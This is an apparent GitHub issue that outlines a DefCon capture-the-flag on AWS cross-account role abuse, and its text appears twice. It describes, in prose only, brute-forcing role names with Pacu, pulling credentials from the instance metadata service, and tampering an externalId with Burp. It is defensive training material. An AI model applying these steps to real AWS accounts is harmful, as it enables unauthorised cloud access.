You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Minimal
Need two AWS empty AWS accounts.
Vendor Account has a server running
EC2 VS Serverless VS LightSail / ElasticBeanstalk. EC2 allows ssrf attack. More common.
ASG behind ELB behind WAF
Challenge 1: Standard Attack - Trivial
Description: Web portal. Instructions on how to use Pacu to solve.
Recon: You are given an account ID. Brute force the role with Pacu.
Attack: Access the vendor portal. Supply the accountID and role.
Challenge 2: Direct Access to Resource - Easy
Description: Website url with some suggested pages to visit. Observe the web traffic. Hint that the Account ID can be extracted from a signed URL.
Recon: A website has a signed URL. Use it to get the AWS Account ID. Brute force role names to find vendors.
Website uses signed URL Use pacu to brute force role names.
Challenge 3: Tamper POST request - Medium
Recon: Foothold container instance. Call metadata service to get credentials. Read cloudtrail logs/CloudWatch events to get externalId.
Attack: Vendor portal does not allow UI tampering of externalID. Use burp to intercept and modify to the discovered value.
Challenge 4: Attack the vendor - Hard
Recon: Hint - you are attacking the vendor's AWS cloud, but you will still need to use the Client portal to discover something about the vendor.
Attack: Up to you. This is the nuclear variation. no hints.
Infrastructure supplied by dungeonmaster
2 AWS accounts for Vendor and Customer.
Hackers will receive unique credentials to a single unique role which they have permissions to modify the trust policy for.
The permission policy of the role will allow them to read the unique CTF secret from and S3 bucket to prove their success.
Hackers will also be able to self register at the vendor portal.
Requirements for hackers
Hackers are encouraged to use docker to run Pacu, but it can be installed with pip.
For Challenges 3 and 4, hackers will need an intercepting proxy like Burp.
The text was updated successfully, but these errors were encountered:
Design to support the following DefCon CTF
Minimal
Need two AWS empty AWS accounts.
Vendor Account has a server running
EC2 VS Serverless VS LightSail / ElasticBeanstalk. EC2 allows ssrf attack. More common.
ASG behind ELB behind WAF
Maximal
Base the Vendor portal off of Panther Labs. Will it allow user isolation and quick customizations?
https://github.com/panther-labs/panther/issues
Challenge 1: Standard Attack - Trivial
Description: Web portal. Instructions on how to use Pacu to solve.
Recon: You are given an account ID. Brute force the role with Pacu.
Attack: Access the vendor portal. Supply the accountID and role.
Challenge 2: Direct Access to Resource - Easy
Description: Website url with some suggested pages to visit. Observe the web traffic. Hint that the Account ID can be extracted from a signed URL.
Recon: A website has a signed URL. Use it to get the AWS Account ID. Brute force role names to find vendors.
Website uses signed URL Use pacu to brute force role names.
Challenge 3: Tamper POST request - Medium
Recon: Foothold container instance. Call metadata service to get credentials. Read cloudtrail logs/CloudWatch events to get externalId.
Attack: Vendor portal does not allow UI tampering of externalID. Use burp to intercept and modify to the discovered value.
Challenge 4: Attack the vendor - Hard
Recon: Hint - you are attacking the vendor's AWS cloud, but you will still need to use the Client portal to discover something about the vendor.
Attack: Up to you. This is the nuclear variation. no hints.
Infrastructure supplied by dungeonmaster
2 AWS accounts for Vendor and Customer.
Hackers will receive unique credentials to a single unique role which they have permissions to modify the trust policy for.
The permission policy of the role will allow them to read the unique CTF secret from and S3 bucket to prove their success.
Hackers will also be able to self register at the vendor portal.
Requirements for hackers
Hackers are encouraged to use docker to run Pacu, but it can be installed with pip.
For Challenges 3 and 4, hackers will need an intercepting proxy like Burp.
The text was updated successfully, but these errors were encountered: